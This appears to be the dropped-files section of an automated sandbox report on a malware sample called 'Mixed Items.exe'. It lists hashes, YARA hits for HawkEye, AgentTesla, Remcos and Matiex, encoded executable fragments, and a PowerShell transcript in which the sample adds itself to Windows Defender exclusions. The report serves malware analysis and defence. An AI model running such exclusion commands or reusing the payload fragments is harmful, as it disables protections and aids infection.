                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):698
                                                                                                    Entropy (8bit):5.049094101509586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                                                                    MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                                                                    SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                                                                    SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                                                                    SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                                                                    Malicious:false
                                                                                                    Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11005962332311817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:26M7vBEzXm/Ey6q9995A+Sq3qQ10nMCldimE8eawHjc85Ev:262vLl68BLyMCldzE9BHjct
                                                                                                    MD5:08E0E756C0E25CF2F85281AF60D4D8D6
                                                                                                    SHA1:D6F1BB1FF8A041151322580BA5D2A4ACE28C9A1F
                                                                                                    SHA-256:767B4A3EF2DE563C663F2A0ACBA6F3D25070D9FC2CE9D8415261A523B5CFC77B
                                                                                                    SHA-512:2CA215A620C049089FB08761594B5E5F3AF363D455F6E1535AFDF0D00A8E0C599A0C15053628A9052E5574267DF3EA8431BCBB7D7F1FC7BF4693AF6DCA8F5464
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11261316214328353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:VwEzXm/Ey6q9995A+H1miM3qQ10nMCldimE8eawHza1miIeEf:Ul68N1tMLyMCldzE9BHza1tIJ
                                                                                                    MD5:607110AB5B12714EDF520B297790FF69
                                                                                                    SHA1:1697CF656BF8DC0F7E6EFAC73306943C97FA289E
                                                                                                    SHA-256:4E1270D6142DCCD70ADBAA4C7D09367BE485011F43CC93F8CDB6B78A42093660
                                                                                                    SHA-512:800087C2DE73C41B0B944863D7148A6F87B96C4BBFDD2797DD28466E02675ECDF6ACAD350A2B470EC2A31B3E20DDAE8C953393DA92EE08DABD4999060C60FB12
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):65536
                                                                                                    Entropy (8bit):0.11257437134850665
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:b2zXm/Ey6q9995A+Hg1mK2P3qQ10nMCldimE8eawHza1mKmAf:bjl68pg1iPLyMCldzE9BHza1R
                                                                                                    MD5:7FF245D22E936F26367E04D77759AB57
                                                                                                    SHA1:3044D4690AF81CC82163B6D3404E170333909B07
                                                                                                    SHA-256:38292B59D919010242643EC6C778F7AC1D78C8265F4FE9056F5C45F2A43A9D2E
                                                                                                    SHA-512:FD0F8A8E6ED5E96300F0BC364ECDE6E825FE74226D41EE47CF3D917D48A49F5E364E302106031E6E9ED11E0A6610A818F46F07DE2D7812E55364D1EAB66AF1EB
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\AdvancedRun.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):91000
                                                                                                    Entropy (8bit):6.241345766746317
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                    MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                    SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                    SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                    SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                    Malicious:false
                                                                                                     Antivirus:
                                                                                                     • Antivirus: Metadefender, Detection: 3%
                                                                                                     • Antivirus: ReversingLabs, Detection: 0%
                                                                                                     Joe Sandbox View (other samples that dropped this file):
                                                                                                     • Filename: CN-Invoice-XXXXX9808-190111432879948.exe, Detection: malicious
                                                                                                     • Filename: Zahlungskopie.exe, Detection: malicious
                                                                                                     • Filename: Purchase Order.exe, Detection: malicious
                                                                                                     • Filename: Reversing Purchase Orders.exe, Detection: malicious
                                                                                                     • Filename: NEW ORDERS 122020 2 x 40 HQ.exe, Detection: malicious
                                                                                                     • Filename: ORDER01032021rfggfscan.exe, Detection: malicious
                                                                                                     • Filename: FedEx's AWB#5305323204643.exe, Detection: malicious
                                                                                                     • Filename: believehot23 cccc.exe, Detection: malicious
                                                                                                     • Filename: order confirmation 6026022001.exe, Detection: malicious
                                                                                                     • Filename: PROFORMA INVOICE.exe, Detection: malicious
                                                                                                     • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious
                                                                                                     • Filename: RFQ - REF 208056-pdf.exe, Detection: malicious
                                                                                                     • Filename: CN-Invoice-XXXXX9808-19011143287994.exe, Detection: malicious
                                                                                                     • Filename: PRODUCT SPECIFICATION.exe, Detection: malicious
                                                                                                     • Filename: DHL_document1102202068090891.exe, Detection: malicious
                                                                                                     • Filename: em6eElVbOm.exe, Detection: malicious
                                                                                                     • Filename: Purchase Order_Pdf.exe, Detection: malicious
                                                                                                     • Filename: Fireman.exe, Detection: malicious
                                                                                                     • Filename: NEW ORDER.exe, Detection: malicious
                                                                                                     • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious
                                                                                                    C:\Users\user\AppData\Local\Temp\98ad118e-d099-425a-b583-efbd423fa467\test.bat
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8399
                                                                                                    Entropy (8bit):4.665734428420432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                    MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                    SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                    SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                    SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                    Malicious:false
                                                                                                    C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):455680
                                                                                                    Entropy (8bit):5.4156534240521
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:L09yLLuWoujzz/DCBGNv5lToO7OsWXiOV:L09yLyWoujHDX5QO7OvXik
                                                                                                    MD5:80C61B903400B534858D047DD0919F0E
                                                                                                    SHA1:D0AB5400B74392308140642C75F0897E16A88D60
                                                                                                    SHA-256:25ADE9899C000A27570B527CFFC938EC9626978219EC8A086082B113CBE4F492
                                                                                                    SHA-512:B3216F0E4E95C7F50BCCBA5FDCCA2AD622A42379383BE855546FA1E0BAC41A6BEEA8226F8634AD5E0D8596169E0443494018BBE70B7052F094402AECAA038BCE
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Matiex, Description: Yara detected Matiex Keylogger, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 54%
                                                                                                    • Antivirus: ReversingLabs, Detection: 90%
                                                                                                    C:\Users\user\AppData\Local\Temp\Purchase Order.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):466432
                                                                                                    Entropy (8bit):6.58109326592699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:Lp85GzC+LZ5DsOwPEsfI2Mt23o/ZMBoYC:W+LZxsJI2M03eZN
                                                                                                    MD5:4983412EC34657BAB4A9BD56617B9960
                                                                                                    SHA1:2A5F9B3FA44597CF439B10B6337A4D1D98197A71
                                                                                                    SHA-256:76C2025CB8251393360BAAC07498C75BAB91A4DB229667F3E6ED2EC89CBEA6D6
                                                                                                    SHA-512:7A786CFC1299CCA28CF3A1A96E3280531F606284392327359A8EED0ABFC47C0C3FFD9BC77C0F7828975047A65DFCD7FDFEEEC50F3BF1C87AFA24C35B2D88612B
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, Author: Joe Security
                                                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Purchase Order.exe, Author: unknown
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jnw4mcb.ygh.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4s1cg2kf.1xe.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zux455h.wha.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3qm3trx.u2l.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mh5wpd4r.xxq.ps1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zyhy1zxg.gf4.psm1
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):532992
                                                                                                    Entropy (8bit):6.507156751280516
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:DufqM5JXbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9E:uJXQtqB5urTIoYWBQk1E+VF9mOx9Ei
                                                                                                    MD5:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                    SHA1:D6E4A3CA253BFC372A9A3180B5887C716ED285C6
                                                                                                    SHA-256:B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
                                                                                                    SHA-512:3AE6E49D3D728531201453A0BC27436B1A4305C8EF938B2CBB5E34EE45BB9A9A88CF2A41B08E4914FDA9A96BBAA48BD999A2D2F1DFFCD39761BB1F3620CA725F
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                    • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                    • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                    C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220672
                                                                                                    Entropy (8bit):6.057903449485828
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:SVQEat7UY8MnZGcqB5AyruUJ7XAzsNvEaEifv6yr9zRsc0qC4B0BUAE3vVAVvoUB:SytJqCUyQNX36yQqbB063cAUAW
                                                                                                    MD5:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                    SHA1:F52F34623048E5FD720E97A72EEDFD32358CD3A9
                                                                                                    SHA-256:1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
                                                                                                    SHA-512:81A7DB927F53660D3A04A161D5C18AAB17D676BCC7AE0738AB786D9BEE82B91016E54E6F70428AEC4087961744BE89B1511F9E07D8DABBE5C2A9D836722395A1
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 43%
                                                                                                    • Antivirus: ReversingLabs, Detection: 93%
                                                                                                    C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):221696
                                                                                                    Entropy (8bit):6.060343577776758
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:K9Wf3ouEAkhUxOCt+qqr3drw0tR5dUimnoSA7Mw4lY2hWYQQgGJrozRscS4+SOw6:KhuI3dlxUOt7IdWLOjCDUjU
                                                                                                    MD5:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                    SHA1:88AFC2923D1EEFB70BAD3C0CD9304949954377EF
                                                                                                    SHA-256:CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
                                                                                                    SHA-512:1E98AEE7DC693822113DCDE1446A5BED1C564B76EEF39F39F3A5D98D7D2099CF69AC92717A3297AFC7082203929F1E9437F21CB6BC690974A0EF6D6CF6E4393C
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: Metadefender, Detection: 43%
                                                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................X..........>v... ........@.. ....................................@..................................u..S.......P............................................................................ ............... ..H............text...DV... ...X.................. ..`.rsrc...P............Z..............@..@.reloc...............`..............@..B................ v......H...........H.............................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                    C:\Users\user\AppData\Local\WindowsAPI\Mixed_Items.exe_Url_4vyxcvojequ3efv0ai33sezp4mazprqx\4.152.723.137\yowqlu0x.newcfg
                                                                                                    Process:C:\Users\user\Desktop\Mixed Items.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8040704
                                                                                                    Entropy (8bit):3.1191276452386894
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:XPtD9fJHnfa0MFig4loNDgfzdUqXYJcenH8CqfykSW7CE9ZCW/V2P/MmEizNCmBi:lvbCRBKLMQtmumls0Mam
                                                                                                    MD5:C4193405C45F878C5E02FA4B263142B8
                                                                                                    SHA1:AA5E3BD8F59352C154860A9B79C3FD11FB01D10B
                                                                                                    SHA-256:281FB62B35A26DB9FF27EF2E651B4E854529EAD0B5853701F96C031AFE69E290
                                                                                                    SHA-512:95BAECF64742AABCF65B161167AB6FA7F09EFB8468A1F4691A4345D333E62D41246541AB156C15E3B5C715568AAECD474E0D478BCD6AB01E30F02096163D6940
                                                                                                    Malicious:false
                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="HhWacKtFzfukChDVbubfTrZrVbAtaVyzZbNqyntLmrIPObE.CSjJWBiTlySaukEqHedjDjyioksOeIaFe" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <HhWacKtFzfukChDVbubfTrZrVbAtaVyzZbNqyntLmrIPObE.CSjJWBiTlySaukEqHedjDjyioksOeIaFe>.. <setting name="RFMEHwInzsKqSMaWl" serializeAs="String">.. <value>77V90V144V0V3V0V0V0V4V0V0V0V255V255V0V0V184V0V0V0V0V0V0V0V64V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V0V128V0V0V0V14V31V186V14V0V180V9V205V33V184V1V76V205V33V84V104V105V1
                                                                                                    C:\Users\user\AppData\Roaming\pid.txt
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):2.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Pm:e
                                                                                                    MD5:C0826819636026DD1F3674774F06C51D
                                                                                                    SHA1:1E768A21723E530122240FA219BFF8C3365F40B2
                                                                                                    SHA-256:01B23136EA7F9F8B9E72C9E125FD710301BAEC28662B0DE2168967838C79E81A
                                                                                                    SHA-512:8AF15968CE7287442204A26F411FF8C3AA6F43167D39A2719DF5C4540B3174D41A6C8063DB82EB49433805CD52F5BC1388BBD032C2C35260E05868C1BBA68E27
                                                                                                    Malicious:false
                                                                                                    Preview: 1392
                                                                                                    C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):47
                                                                                                    Entropy (8bit):4.376204213693507
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:oNWXp5cViE2J5xAI4F:oNWXp+N23f8
                                                                                                    MD5:EE8C153C2C2A0850DEE1BE69D03BB011
                                                                                                    SHA1:2F2FBC7ABB2EEE1DF6198FF180860516D983905A
                                                                                                    SHA-256:15B7AAE18CB550E8A7B4210496289D53D84CF86ECDC4C175BBFEB789B08FC488
                                                                                                    SHA-512:CF9F63528B0D50FA85EF6E2A0364178DF20A60557038A76E32C348196B969566D5071BD272534EAC2DCA5197947FFB5A4DCD723FC8135FDB81372E657DF7A2D8
                                                                                                    Malicious:false
                                                                                                    Preview: C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.0nP0+V72.20210305142754.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):846
                                                                                                    Entropy (8bit):5.310409359628285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSA0xvBnbx2DOXUWeSuqpWeHjeTKKjX4CIym1ZJXuuqh:BZIvhboO+Sp4eqDYB1ZUph
                                                                                                    MD5:F69879D2324FA8DDEF956B398557F5E4
                                                                                                    SHA1:CF90260BB7E81F4B58E1EB0CDF7E4F7F2B315668
                                                                                                    SHA-256:7C8D023C9F24F0AE23102B889B376FE9EE573A51E35EDE3592D61D0A32801C96
                                                                                                    SHA-512:70DB8EC1AECA708B301E0C83E75BAFE8D2BA2DE6EEE26740041480763E9358EE754DD4CEE3D1DCC6EA6CBA75C35FD5C673833377C802F16EC0160B2DFC7A8037
                                                                                                    Malicious:false
                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210305142826..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..Process ID: 2152..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210305142826..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Mixed Items.exe -Force..
                                                                                                    C:\Users\user\Documents\20210305\PowerShell_transcript.506013.RPfp4n8i.20210305142756.txt
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):916
                                                                                                    Entropy (8bit):5.4360707335352405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:BxSAAxvBnbx2DOXUWeSuAjWoHjeTKKjX4CIym1ZJXCuAL:BZEvhboO+SVqoqDYB1ZcVL
                                                                                                    MD5:55B592D61FB7A30573C912A818C91951
